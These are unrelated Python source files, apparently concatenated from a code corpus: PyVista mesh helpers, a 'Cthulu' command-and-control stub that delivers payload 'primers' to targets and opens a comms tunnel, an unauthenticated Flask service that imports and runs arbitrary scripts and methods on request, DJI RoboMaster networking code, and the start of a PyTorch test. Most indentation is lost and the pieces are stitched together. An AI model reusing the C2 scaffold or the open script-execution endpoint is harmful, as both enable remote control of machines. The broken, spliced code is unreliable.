'vtkRectilinearGrid': pyvista.RectilinearGrid,
'vtkStructuredGrid': pyvista.StructuredGrid,
'vtkPolyData': pyvista.PolyData,
'vtkImageData': pyvista.UniformGrid,
'vtkStructuredPoints': pyvista.UniformGrid,
'vtkMultiBlockDataSet': pyvista.MultiBlock,
'vtkTable': pyvista.Table,
# 'vtkParametricSpline': pyvista.Spline,
}
# Otherwise, we assume a VTK data object was passed
if hasattr(dataset, 'GetClassName'):
key = dataset.GetClassName()
elif dataset is None:
return None
elif isinstance(dataset, np.ndarray):
if dataset.ndim == 1 and dataset.shape[0] == 3:
return pyvista.PolyData(dataset)
if dataset.ndim > 1 and dataset.ndim < 3 and dataset.shape[1] == 3:
return pyvista.PolyData(dataset)
elif dataset.ndim == 3:
mesh = pyvista.UniformGrid(dataset.shape)
mesh['values'] = dataset.ravel(order='F')
mesh.active_scalars_name = 'values'
return mesh
        else:
            raise NotImplementedError(
                f'NumPy array with shape {dataset.shape} could not be converted to a PyVista mesh.')
elif is_meshio_mesh(dataset):
return from_meshio(dataset)
elif dataset.__class__.__name__ == 'Trimesh':
# trimesh doesn't pad faces
n_face = dataset.faces.shape[0]
faces = np.empty((n_face, 4), dataset.faces.dtype)
faces[:, 1:] = dataset.faces
faces[:, 0] = 3
return pyvista.PolyData(np.asarray(dataset.vertices), faces)
else:
raise NotImplementedError(f'Type ({type(dataset)}) not able to be wrapped into a PyVista mesh.')
try:
wrapped = wrappers[key](dataset)
except KeyError:
logging.warning(f'VTK data type ({key}) is not currently supported by pyvista.')
return dataset # if not supported just passes the VTK data object
return wrapped
def image_to_texture(image):
"""Convert ``vtkImageData`` (:class:`pyvista.UniformGrid`) to a ``vtkTexture``."""
return pyvista.Texture(image)
def numpy_to_texture(image):
"""Convert a NumPy image array to a vtk.vtkTexture."""
return pyvista.Texture(image)
def is_inside_bounds(point, bounds):
"""Check if a point is inside a set of bounds.
This is implemented through recursion so that this is N-dimensional.
"""
if isinstance(point, (int, float)):
point = [point]
if isinstance(point, (np.ndarray, collections.abc.Sequence)) and not isinstance(point, collections.deque):
if len(bounds) < 2 * len(point) or len(bounds) % 2 != 0:
            raise ValueError('Bounds do not match the dimensionality of the point.')
point = collections.deque(point)
bounds = collections.deque(bounds)
return is_inside_bounds(point, bounds)
if not isinstance(point, collections.deque):
raise TypeError(f'Unknown input data type ({type(point)}).')
if len(point) < 1:
return True
p = point.popleft()
lower, upper = bounds.popleft(), bounds.popleft()
if lower <= p <= upper:
return is_inside_bounds(point, bounds)
return False
def fit_plane_to_points(points, return_meta=False):
"""Fit a plane to a set of points.
Parameters
----------
    points : np.ndarray
        Size n by 3 array of points through which to fit a plane.
    return_meta : bool
        If ``True``, also return the center and normal used to
        generate the plane.
"""
data = np.array(points)
center = data.mean(axis=0)
result = np.linalg.svd(data - center)
normal = np.cross(result[2][0], result[2][1])
plane = pyvista.Plane(center=center, direction=normal)
if return_meta:
return plane, center, normal
return plane
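# Illustrative usage sketch (not part of the original module): fit a plane
# through a noisy, roughly planar point cloud and recover its center/normal.
def _example_fit_plane():  # pragma: no cover - illustrative only
    rng = np.random.default_rng(0)
    points = rng.random((100, 3)) * np.array([5.0, 5.0, 0.05])   # nearly flat in z
    plane, center, normal = fit_plane_to_points(points, return_meta=True)
    return plane, center, normal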
def raise_not_matching(scalars, mesh):
"""Raise exception about inconsistencies."""
if isinstance(mesh, vtk.vtkTable):
raise ValueError(f'Number of scalars ({scalars.size}) must match number of rows ({mesh.n_rows}).')
raise ValueError(f'Number of scalars ({scalars.size}) ' +
f'must match either the number of points ({mesh.n_points}) ' +
f'or the number of cells ({mesh.n_cells}).')
def generate_plane(normal, origin):
"""Return a vtk.vtkPlane."""
plane = vtk.vtkPlane()
# NORMAL MUST HAVE MAGNITUDE OF 1
normal = normal / np.linalg.norm(normal)
plane.SetNormal(normal)
plane.SetOrigin(origin)
return plane
def try_callback(func, *args):
"""Wrap a given callback in a try statement."""
try:
func(*args)
except Exception:
etype, exc, tb = sys.exc_info()
stack = traceback.extract_tb(tb)[1:]
formatted_exception = \
'Encountered issue in callback (most recent call last):\n' + \
''.join(traceback.format_list(stack) +
traceback.format_exception_only(etype, exc)).rstrip('\n')
logging.warning(formatted_exception)
return
def check_depth_peeling(number_of_peels=100, occlusion_ratio=0.0):
"""Check if depth peeling is available.
Attempts to use depth peeling to see if it is available for the current
environment. Returns ``True`` if depth peeling is available and has been
successfully leveraged, otherwise ``False``.
"""
# Try Depth Peeling with a basic scene
source = vtk.vtkSphereSource()
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
# requires opacity < 1
actor.GetProperty().SetOpacity(0.5)
renderer = vtk.vtkRenderer()
renderWindow = vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindow.SetOffScreenRendering(True)
renderWindow.SetAlphaBitPlanes(True)
renderWindow.SetMultiSamples(0)
renderer.AddActor(actor)
renderer.SetUseDepthPeeling(True)
renderer.SetMaximumNumberOfPeels(number_of_peels)
renderer.SetOcclusionRatio(occlusion_ratio)
renderWindow.Render()
return renderer.GetLastRenderingUsedDepthPeeling() == 1
def threaded(fn):
"""Call a function using a thread."""
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
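# Illustrative usage sketch (not part of the original module): run a slow task
# in the background and get the ``Thread`` handle back immediately.
def _example_threaded():  # pragma: no cover - illustrative only
    import time
    @threaded
    def _sleep_task(seconds):
        time.sleep(seconds)
    thread = _sleep_task(0.1)   # returns immediately with the running Thread
    thread.join()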
class conditional_decorator:
"""Conditional decorator for methods."""
def __init__(self, dec, condition):
"""Initialize."""
self.decorator = dec
self.condition = condition
def __call__(self, func):
"""Call the decorated function if condition is matched."""
if not self.condition:
# Return the function unchanged, not decorated.
return func
return self.decorator(func)
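# Illustrative usage sketch (not part of the original module): apply the
# ``threaded`` decorator above only when a condition holds.
def _example_conditional_decorator(use_thread=False):  # pragma: no cover - illustrative only
    @conditional_decorator(threaded, use_thread)
    def _task():
        return 42
    # Plain result when use_thread is False, a Thread handle otherwise.
    return _task()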
class ProgressMonitor():
"""A standard class for monitoring the progress of a VTK algorithm.
    This must be used in a ``with`` context, and it will block keyboard
    interrupts until the exit event, because an interrupt would crash the
    kernel if the VTK algorithm is still executing.
"""
def __init__(self, algorithm, message="", scaling=100):
"""Initialize observer."""
try:
from tqdm import tqdm
except ImportError:
raise ImportError("Please install `tqdm` to monitor algorithms.")
self.event_type = vtk.vtkCommand.ProgressEvent
self.progress = 0.0
self._last_progress = self.progress
self.algorithm = algorithm
self.message = message
self._interrupt_signal_received = False
self._old_progress = 0
self._old_handler = None
self._progress_bar = None
def handler(self, sig, frame):
"""Pass signal to custom interrupt handler."""
self._interrupt_signal_received = (sig, frame)
logging.debug('SIGINT received. Delaying KeyboardInterrupt until '
'VTK algorithm finishes.')
def __call__(self, obj, event, *args):
"""Call progress update callback.
On an event occurrence, this function executes.
"""
if self._interrupt_signal_received:
obj.AbortExecuteOn()
else:
progress = obj.GetProgress()
step = progress - self._old_progress
self._progress_bar.update(step)
self._old_progress = progress
def __enter__(self):
"""Enter event for ``with`` context."""
from tqdm import tqdm
# check if in main thread
if threading.current_thread().__class__.__name__ == '_MainThread':
self._old_handler = signal.signal(signal.SIGINT, self.handler)
self._progress_bar = tqdm(total=1, leave=True,
bar_format='{l_bar}{bar}[{elapsed}<{remaining}]')
self._progress_bar.set_description(self.message)
self.algorithm.AddObserver(self.event_type, self)
return self._progress_bar
def __exit__(self, type, value, traceback):
"""Exit event for ``with`` context."""
self._progress_bar.total = 1
self._progress_bar.refresh()
self._progress_bar.close()
self.algorithm.RemoveObservers(self.event_type)
if threading.current_thread().__class__.__name__ == '_MainThread':
signal.signal(signal.SIGINT, self._old_handler)
def abstract_class(cls_):
"""Decorate a class, overriding __new__.
    Prevents the class from being instantiated, similar to ``abc.ABCMeta``,
    but does not require an abstract method.
"""
def __new__(cls, *args, **kwargs):
if cls is cls_:
raise TypeError(f'{cls.__name__} is an abstract class and may not be instantiated.')
return object.__new__(cls)
cls_.__new__ = __new__
return cls_
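# Illustrative usage sketch (not part of the original module): the decorated
# base class refuses direct instantiation while subclasses still work.
@abstract_class
class _ExampleAbstractBase:  # pragma: no cover - illustrative only
    pass
class _ExampleConcrete(_ExampleAbstractBase):
    pass
# _ExampleAbstractBase()  -> raises TypeError
# _ExampleConcrete()      -> returns an instance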
def axis_rotation(points, angle, inplace=False, deg=True, axis='z'):
"""Rotate points angle (in deg) about an axis."""
axis = axis.lower()
    # Copy the original array if not rotating in place
if not inplace:
points = points.copy()
# Convert angle to radians
if deg:
angle *= np.pi / 180
if axis == 'x':
y = points[:, 1] * np.cos(angle) - points[:, 2] * np.sin(angle)
z = points[:, 1] * np.sin(angle) + points[:, 2] * np.cos(angle)
points[:, 1] = y
points[:, 2] = z
elif axis == 'y':
x = points[:, 0] * np.cos(angle) + points[:, 2] * np.sin(angle)
z = - points[:, 0] * np.sin(angle) + points[:, 2] * np.cos(angle)
points[:, 0] = x
points[:, 2] = z
elif axis == 'z':
x = points[:, 0] * np.cos(angle) - points[:, 1] * np.sin(angle)
y = points[:, 0] * np.sin(angle) + points[:, 1] * np.cos(angle)
points[:, 0] = x
points[:, 1] = y
else:
raise ValueError('invalid axis. Must be either "x", "y", or "z"')
if not inplace:
return points
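# Illustrative usage sketch (not part of the original module): rotating a point
# on the x-axis by 90 degrees about z should land it on the y-axis.
def _example_axis_rotation():  # pragma: no cover - illustrative only
    pts = np.array([[1.0, 0.0, 0.0]])
    rotated = axis_rotation(pts, 90, inplace=False, deg=True, axis='z')
    assert np.allclose(rotated, [[0.0, 1.0, 0.0]])
    return rotated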
|
Cthulu.py
|
# @author Stefano Sesia all rights reserved
# Cthulu command and control center
# Requires sudo apt-get install mingw-w64
# Library Imports
from CommunicationTunnelServer import *
from TrivialFunctions import *
from WebServer import *
import constants
# Constants
PORT = 8000
#Functions
def setKey(passphrase):
constants.key = passphrase
def initializeWebServer():
output(0,"step","Initializing the server for primers delivery")
try:
threadedSimpleServer()
return True
except:
output(1,"error","There was an error starting the server, quitting...")
return False
def generatePrimer(platform):
output(0,"step","Generating the primers")
if platform == "WIN":
output(1,"progress","Target is running a Windows OS")
elif platform == "UNIX":
output(1, "progress", "Target is running a Unix OS")
else:
output(1,"error","OS not yet supported")
return False
def attack():
output(2, "warning", "function not yet implemented")
def tunnel():
output(0,"step","Starting the comms tunnel")
## This module can later be changed to include dnscat
tunnelThread = threading.Thread(target=startTunnel)
#tunnelThread.daemon = True
tunnelThread.start()
def main():
print("0--------------------------------------------------0")
print("| Greetings adventurer, |")
print("| Thou halt invoked the presence of a Great Old One|")
print("| Cthulu is listening, use this power wisely! |")
print("| ^(;,;)^ |")
print("0--------------------------------------------------0\n")
if not initializeWebServer():
return()
output(0, "step", "Generating a random key for the communication tunnel")
setKey(generateRandomKey())
output(1, "info", "The key is: " + constants.key)
if not writePrimerHeader(constants.key):
return()
tunnel()
main()
|
app.py
|
import importlib
import sys
import threading
from pathlib import Path
from flask import Flask, request
app = Flask(__name__)
SCRIPTS_PATH = 'scripts'
mod = None
def run_script_thread(script_name, script_arguments):
global mod
print("Running script {} with arguments {}".format(script_name, script_arguments))
sys.argv[1:] = script_arguments
script_name = script_name.replace(".py", "")
try:
mod = importlib.import_module(SCRIPTS_PATH + "." + script_name)
except Exception as e:
print("Error importing script {}".format(e))
return "Script {} returned error".format(e)
return "OK"
def run_method_thread(method_name, method_arguments):
global mod
print("Running method {} with arguments {}".format(method_name, method_arguments))
try:
if method_arguments:
function = getattr(mod, method_name)
result = function(*method_arguments)
else:
result = getattr(mod, method_name)()
except Exception as e:
print("Error calling method {}".format(e))
return "Script {} returned error".format(e)
return "OK"
@app.route('/method', methods=['POST'])
def call_specific_method():
global mod
params = request.json
    method_name = params.get('method_name')
    method_arguments = params.get('method_arguments')
if method_name:
try:
x = threading.Thread(target=run_method_thread, args=(method_name, method_arguments))
x.start()
x.join()
except Exception as e:
return "Script {} returned error".format(e), 405
return "Called method", 200
return "Method can't be null", 400
@app.route('/script', methods=['POST'])
def run_script():
# Get the script from the request
script = request.json
script_name = script['script_name']
script_arguments = script['script_arguments']
try:
x = threading.Thread(target=run_script_thread, args=(script_name, script_arguments))
x.start()
x.join()
except Exception as e:
return "Script {} returned error".format(e)
return "200"
if __name__ == '__main__':
Path("./scripts").mkdir(parents=True, exist_ok=True)
app.run(host='0.0.0.0', port=9090)
|
03_tcp_server.py
|
"""
Quick spool TCP server, using built in socket module
"""
import socket
import threading
bind_ip = '0.0.0.0'
bind_port = 9999
# Create server socket, using IPv4 and TCP socket type
server = socket.socket(family=socket.AF_INET,
type=socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
# Threadable client handler
def handle_client(client_socket: socket.socket):
# Catch and print what client sent
request = client_socket.recv(1024)
print(f" [*] Received\n")
print(request.decode("utf-8"))
# Respond with generic ACK
client_socket.send(b"ACK!")
client_socket.close()
print(f"[*] Listening on {bind_ip}:{bind_port}")
runs = 3
while runs != 0:
client, addr = server.accept()
print(f" [*] Accepted connection from {addr[0]}:{addr[1]}")
# Spin thread to handle incoming data
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
runs -= 1
print("[*] Closed")
|
conn.py
|
# -*-coding:utf-8-*-
# Copyright (c) 2020 DJI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import socket
import binascii
import traceback
import threading
import queue
import random
import time
import base64
import errno
from ftplib import FTP
from . import algo
from . import protocol
from . import logger
from . import config
CONNECTION_USB_RNDIS = 'rndis'
CONNECTION_WIFI_AP = 'ap'
CONNECTION_WIFI_STA = 'sta'
CONNECTION_PROTO_TCP = 'tcp'
CONNECTION_PROTO_UDP = 'udp'
__all__ = ['Connection']
def get_local_ip():
"""
    Get the local IP address.
    :return: the local IP address
"""
return socket.gethostbyname(socket.gethostname())
def get_sn_form_data(data):
""" 从 data 中获取 sn 字段
:param data:
:return:
"""
data = data.split(b'\x00')
recv_sn = data[0]
recv_sn = recv_sn.decode(encoding='utf-8')
return recv_sn
def scan_robot_ip(user_sn=None, timeout=3.0):
""" 扫描机器人的IP地址
:return: 机器人的IP地址
"""
try:
# if user specifies SN
if user_sn:
# check the validity of input SN
if config.ROBOT_SN_LEN != len(user_sn):
raise Exception("The length of SN is invalid!")
find_robot = False
robot_ip = None
start = time.time()
while not find_robot:
end = time.time()
if end - start > timeout:
break
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", config.ROBOT_BROADCAST_PORT))
s.settimeout(1)
data, ip = s.recvfrom(1024)
recv_sn = get_sn_form_data(data)
logger.info("conn: scan_robot_ip, data:{0}, ip:{1}".format(recv_sn, ip))
if recv_sn == user_sn:
robot_ip = ip[0]
find_robot = True
except socket.error as error:
# If multiple processes trying to connected to different
# RoboMasters are started at the same time, the socket will
# not be able to bind. In that case, try again until timeout.
if not error.errno == errno.EADDRINUSE:
raise
if robot_ip:
return robot_ip
else:
logger.error("Cannot found robot based on the specified SN!")
return None
else:
# for compatibility with previous versions.
config.ROBOT_BROADCAST_PORT = 45678
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", config.ROBOT_BROADCAST_PORT))
s.settimeout(timeout)
data, ip = s.recvfrom(1024)
logger.info("conn: scan_robot_ip, data:{0}, ip:{1}".format(binascii.hexlify(data), ip))
return ip[0]
except Exception as e:
logger.error("scan_robot_ip: exception {0}".format(e))
return None
def scan_robot_ip_list(timeout=3.0):
""" 扫描局域网内的机器人IP地址
:param timeout: 超时时间
:return: list,扫描到的小车IP列表
"""
ip_list = []
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", config.ROBOT_BROADCAST_PORT))
except Exception as e:
logger.warning("scan_robot_ip_list: exception {0}".format(e))
return ip_list
start = time.time()
while True:
end = time.time()
if end-start > timeout:
break
s.settimeout(1)
try:
data, ip = s.recvfrom(1024)
except Exception as e:
logger.warning("scan_robot_ip_list: socket recv, {0}".format(e))
continue
logger.info("conn: scan_robot_ip, data:{0}, ip:{1}".format(data[:-1].decode(encoding='utf-8'), ip))
if ip[0] not in ip_list:
ip_list.append(ip[0])
logger.info("conn: scan_robot_ip_list, ip_list:{0}".format(ip_list))
print("find robot sn:{0}, ip:{1}".format(str(data[:-1].decode(encoding='utf-8')), ip[0]))
return ip_list
class BaseConnection(object):
def __init__(self):
self._sock = None
self._buf = bytearray()
self._host_addr = None
self._target_addr = None
self._proto_type = None
self._proto = None
def create(self):
try:
if self._proto_type == CONNECTION_PROTO_TCP:
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.bind(self._host_addr)
self._sock.connect(self._target_addr)
logger.info("TcpConnection, connect success {0}".format(self._host_addr))
elif self._proto_type == CONNECTION_PROTO_UDP:
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._sock.bind(self._host_addr)
logger.info("UdpConnection, bind {0}".format(self._host_addr))
else:
logger.error("Connection: {0} unexpected connection param set".format(self._proto_type))
except Exception as e:
logger.warning("udpConnection: create, host_addr:{0}, exception:{1}".format(self._host_addr, e))
raise
def close(self):
if self._sock:
self._sock.close()
    def recv(self):
        data = None
        try:
            if self._sock:
                data, host = self._sock.recvfrom(2048)
except Exception as e:
logger.warning("Connection: recv, exception:{0}".format(e))
raise
if data is None:
logger.warning("Connection: recv buff None.")
return None
self._buf.extend(data)
if len(self._buf) == 0:
logger.warning("Connection: recv buff None.")
return None
msg, self._buf = protocol.decode_msg(self._buf, self._proto)
if not msg:
logger.warning("Connection: protocol.decode_msg is None.")
return None
else:
if isinstance(msg, protocol.MsgBase):
if not msg.unpack_protocol():
logger.warning("Connection: recv, msg.unpack_protocol failed, msg:{0}".format(msg))
return msg
def send(self, buf):
try:
if self._sock:
self._sock.sendto(buf, self._target_addr)
except Exception as e:
logger.warning("Connection: send, exception:{0}".format(e))
raise
def send_self(self, buf):
try:
if self._sock:
self._sock.sendto(buf, self._host_addr)
except Exception as e:
logger.warning("Connection: send, exception:{0}".format(e))
raise
class Connection(BaseConnection):
def __init__(self, host_addr, target_addr, proto="v1", protocol=CONNECTION_PROTO_UDP):
self._host_addr = host_addr
self._target_addr = target_addr
self._proto = proto
self._proto_type = protocol
self._sock = None
self._buf = bytearray()
def __repr__(self):
return "Connection, host:{0}, target:{1}".format(self._host_addr, self._target_addr)
@property
def target_addr(self):
return self._target_addr
@property
def protocol(self):
return self._proto
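# Illustrative usage sketch (the addresses and payload bytes below are
# assumptions): open a UDP connection, push a raw buffer to the robot, read one
# reply, and close. Real callers obtain the address pair from
# SdkConnection.request_connection defined below.
def _example_connection():
    conn = Connection(('0.0.0.0', 10200), ('192.168.2.1', 20020),
                      proto='v1', protocol=CONNECTION_PROTO_UDP)
    conn.create()
    try:
        conn.send(b'\x55\x0d\x04')   # illustrative payload only
        msg = conn.recv()            # blocks until a message is decoded
    finally:
        conn.close()
    return msg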
class SdkConnection(BaseConnection):
def __init__(self):
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def __del__(self):
self.close()
def switch_remote_route(self, msg, remote_addr, timeout=5):
if not self._sock:
return False, None
buf = msg.pack()
try:
self._sock.settimeout(timeout)
self._sock.sendto(buf, remote_addr)
self._sock.settimeout(timeout)
data, address = self._sock.recvfrom(1024)
logger.debug("SdkConnection, data:{0}.".format(binascii.hexlify(data)))
resp_msg, data = protocol.decode_msg(data)
            if resp_msg is None:
                return False, None
            resp_msg.unpack_protocol()
            if resp_msg:
prot = resp_msg.get_proto()
if prot._retcode == 0:
if prot._state == 0:
logger.info("SdkConnection: accept connection.")
if prot._state == 1:
logger.error("SdkConnection: reject connection, service is busy!")
return False, None
if prot._state == 2:
logger.info("SdkConnection: got config ip:{0}".format(prot._config_ip))
return True, prot._config_ip
except socket.timeout:
logger.error("SdkConnection: RECV TimeOut!")
raise
except Exception as e:
logger.warning("SdkConnection: switch_remote_route, exception:{0}, Please Check Connections.".format(e))
logger.warning("SdkConnection:{0}".format(traceback.format_exc()))
return False, None
def request_connection(self, sdk_host, conn_type=None, proto_type=None, sn=None):
if conn_type is None:
logger.error("Not Specific conn_type!")
logger.info("CONN TYPE is {0}".format(conn_type))
local_addr = None
remote_addr = None
proto = protocol.ProtoSetSdkConnection()
if conn_type is CONNECTION_WIFI_AP:
proto._connection = 0
if config.LOCAL_IP_STR:
proto._ip = config.LOCAL_IP_STR
else:
proto._ip = '0.0.0.0'
logger.info("Robot: request_connection, ap get local ip:{0}".format(proto._ip))
proto._port = random.randint(config.ROBOT_SDK_PORT_MIN, config.ROBOT_SDK_PORT_MAX)
proxy_addr = (config.ROBOT_DEFAULT_WIFI_ADDR[0], config.ROBOT_PROXY_PORT)
remote_addr = config.ROBOT_DEFAULT_WIFI_ADDR
local_addr = (proto._ip, proto._port)
elif conn_type is CONNECTION_WIFI_STA:
proto._connection = 1
local_ip = '0.0.0.0'
if config.LOCAL_IP_STR:
local_ip = config.LOCAL_IP_STR
            proto._ip = local_ip
proto._port = random.randint(config.ROBOT_SDK_PORT_MIN, config.ROBOT_SDK_PORT_MAX)
logger.info("SdkConnection: request_connection with ip:{0}, port:{1}".format(local_ip, proto._port))
if config.ROBOT_IP_STR:
remote_ip = config.ROBOT_IP_STR
else:
remote_ip = scan_robot_ip(sn)
if not remote_ip:
return False, None, None
local_addr = (local_ip, proto._port)
remote_addr = (remote_ip, config.ROBOT_DEVICE_PORT)
proxy_addr = (remote_ip, config.ROBOT_PROXY_PORT)
elif conn_type is CONNECTION_USB_RNDIS:
proto._connection = 2
proto._ip = config.ROBOT_DEFAULT_LOCAL_RNDIS_ADDR[0]
proto._port = random.randint(config.ROBOT_SDK_PORT_MIN,
config.ROBOT_SDK_PORT_MAX)
proxy_addr = (config.ROBOT_DEFAULT_RNDIS_ADDR[0], config.ROBOT_PROXY_PORT)
local_addr = (config.ROBOT_DEFAULT_LOCAL_RNDIS_ADDR[0], proto._port)
remote_addr = config.ROBOT_DEFAULT_RNDIS_ADDR
logger.info("SdkConnection: request_connection, local addr {0}, remote_addr {1}, "
"proxy addr {2}".format(local_addr, remote_addr, proxy_addr))
proto._host = sdk_host
if proto_type == CONNECTION_PROTO_TCP:
proto._protocol = 1
else:
proto._protocol = 0
msg = protocol.Msg(sdk_host, protocol.host2byte(9, 0), proto)
try:
result, local_ip = self.switch_remote_route(msg, proxy_addr)
if result:
if config.LOCAL_IP_STR:
local_ip = config.LOCAL_IP_STR
local_addr = (local_ip, proto._port)
else:
return False, local_addr, remote_addr
return result, local_addr, remote_addr
except socket.timeout:
logger.warning("SdkConnection: Connection Failed, please check hareware connections!!!")
return False, local_addr, remote_addr
except Exception as e:
logger.warning("SdkConnection: request_connection, switch_remote_route exception {0}".format(str(e)))
return False, local_addr, remote_addr
class StreamConnection(object):
def __init__(self):
self._sock = None
self._sock_queue = queue.Queue(32)
self._sock_recv = None
self._recv_count = 0
self._receiving = False
def __del__(self):
if self._sock:
self._sock.close()
def connect(self, addr, ip_proto="tcp"):
try:
if ip_proto == "tcp":
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.settimeout(3)
logger.info("StreamConnection: try to connect {0}".format(addr))
time.sleep(0.1)
self._sock.connect(addr)
elif ip_proto == "udp":
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._sock.bind(addr)
else:
logger.error("StreamConnection: ip_proto:{0} not supperted.".format(ip_proto))
except Exception as e:
logger.error("StreamConnection: connect addr {0}, exception {1}".format(addr, e))
return False
self._sock_recv = threading.Thread(target=self._recv_task)
self._sock_recv.start()
logger.info("StreamConnection {0} successfully!".format(addr))
return True
def disconnect(self):
self._receiving = False
self._sock_queue.put(None)
if self._sock_recv:
self._sock_recv.join()
self._sock.close()
self._sock_queue.queue.clear()
self._recv_count = 0
logger.info("StreamConnection: disconnected")
def _recv_task(self):
self._receiving = True
logger.info("StreamConnection: _recv_task, Start to receiving Data...")
while self._receiving:
try:
if self._sock is None:
break
data, addr = self._sock.recvfrom(4096)
if not self._receiving:
break
self._recv_count += 1
if self._sock_queue.full():
logger.warning("StreamConnection: _recv_task, sock_data_queue is full.")
self._sock_queue.get()
else:
logger.debug("StreamConnection: _recv_task, recv {0}, len:{1}, data:{2}".format(
self._recv_count, len(data), data))
self._sock_queue.put(data)
except socket.timeout:
logger.warning("StreamConnection: _recv_task, recv data timeout!")
continue
except Exception as e:
logger.error("StreamConnection: recv, exceptions:{0}".format(e))
self._receiving = False
return
def read_buf(self, timeout=2):
try:
buf = self._sock_queue.get(timeout=timeout)
return buf
except Exception as e:
logger.warning("StreamConnection: read_buf, exception {0}".format(e))
return None
class ConnectionHelper:
def __init__(self):
self._appid = str(random.randint(10000, 20000))
self._ssid = ""
self._password = ""
self._sta_info = protocol.STAConnInfo()
def build_qrcode_string(self, ssid="", password=""):
self._ssid = ssid
self._password = password
self._sta_info.set_info(ssid, password, self._appid)
buf = self._sta_info.pack()
buf = algo.simple_encrypt(buf)
return bytes.decode(base64.b64encode(buf), encoding='utf-8')
def get_qrcode_string(self):
buf = self._sta_info.pack()
buf = algo.simple_encrypt(buf)
return bytes.decode(base64.b64encode(buf), encoding='utf-8')
def wait_for_connection(self):
try:
config.ROBOT_BROADCAST_PORT = 45678
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", config.ROBOT_BROADCAST_PORT))
s.settimeout(360)
logger.info("waiting for connections...")
while True:
data, ip = s.recvfrom(1024)
if data:
decode_buf = algo.simple_encrypt(data)
conn_info = protocol.STAConnInfo()
if conn_info.unpack(decode_buf):
if conn_info._recv_appid == self._appid:
s.sendto(self._appid.encode(encoding='utf-8'), ip)
return True
else:
logger.debug("skip data!")
else:
logger.warning("wait_for_connection unpack failed!")
except Exception as e:
logger.warning("recv_task: exception {0}".format(e))
return False
class FtpConnection:
def __init__(self):
self._ftp = FTP()
self._target = None
self._bufsize = 1024
self._ftp.set_debuglevel(0)
def connect(self, ip):
self._target = ip
logger.info("FtpConnection: connect ip: {0}".format(ip))
return self._ftp.connect(ip, 21)
def upload(self, src_file, target_file):
try:
            with open(src_file, 'rb') as fp:
                self._ftp.storbinary("STOR " + target_file, fp, self._bufsize)
except Exception as e:
logger.warning("FtpConnection: upload e {0}".format(e))
def stop(self):
if self._ftp:
self._ftp.close()
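# Illustrative usage sketch (the IP and file paths below are assumptions): push
# a local file to the robot's FTP service and close the session.
def _example_ftp_upload(ip='192.168.2.1'):
    ftp = FtpConnection()
    ftp.connect(ip)
    ftp.upload('local_script.py', '/python/main.py')   # hypothetical paths
    ftp.stop()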
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
# --------------------------------------------------------
# handlers
# --------------------------------------------------------
@app.route('/')
def home():
return "Proctor bot is live!"
# ========================================================
# Initialize server
# ========================================================
def run():
app.run(host='0.0.0.0', port=8080)
# ========================================================
# Initialize server thread
# ========================================================
def keep_alive():
thread = Thread(target=run)
thread.start()
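# Illustrative usage sketch: call ``keep_alive()`` from the bot's entry point
# before starting the bot loop so the Flask thread keeps the host awake.
if __name__ == '__main__':  # pragma: no cover - manual check only
    keep_alive()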
|
test_dataloader.py
|
import math
import sys
import errno
import os
import ctypes
import faulthandler
import torch
import gc
import time
import signal
import unittest
import itertools
import warnings
import tempfile
from torch import multiprocessing as mp
from torch.utils.data import _utils, Dataset, IterableDataset, TensorDataset, DataLoader, ConcatDataset, ChainDataset, Subset
from torch.utils.data._utils import MP_STATUS_CHECK_INTERVAL
from torch.utils.data.dataset import random_split
from torch._utils import ExceptionWrapper
from torch.testing._internal.common_utils import (TestCase, run_tests, TEST_NUMPY, IS_WINDOWS,
IS_PYTORCH_CI, NO_MULTIPROCESSING_SPAWN, skipIfRocm, slowTest,
load_tests, TEST_WITH_TSAN, IS_SANDCASTLE)
try:
import psutil
HAS_PSUTIL = True
except ImportError:
HAS_PSUTIL = False
err_msg = ("psutil not found. Some critical data loader tests relying on it "
"(e.g., TestDataLoader.test_proper_exit) will not run.")
if IS_PYTORCH_CI:
raise ImportError(err_msg) from None
else:
warnings.warn(err_msg)
# load_tests from torch.testing._internal.common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA from torch.testing._internal.common_cuda here, because if we do that,
# the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed multiple times
# as well during the execution of this test suite, and it will cause
# CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
if not NO_MULTIPROCESSING_SPAWN:
    # We want to use `spawn` if possible because some of our tests check that the
    # data loader terminates gracefully. To prevent hanging in the testing
# process, such data loaders are run in a separate subprocess.
#
# We also want to test the `pin_memory=True` configuration, thus `spawn` is
# required to launch such processes and they initialize the CUDA context.
#
    # Mixing different start methods is a recipe for disaster (e.g., using a fork
# `mp.Event` with a spawn `mp.Process` segfaults). So we set this globally
# to avoid bugs.
#
# Get a multiprocessing context because some test / third party library will
# set start_method when imported, and setting again triggers `RuntimeError`.
mp = mp.get_context(method='spawn')
# 60s of timeout?
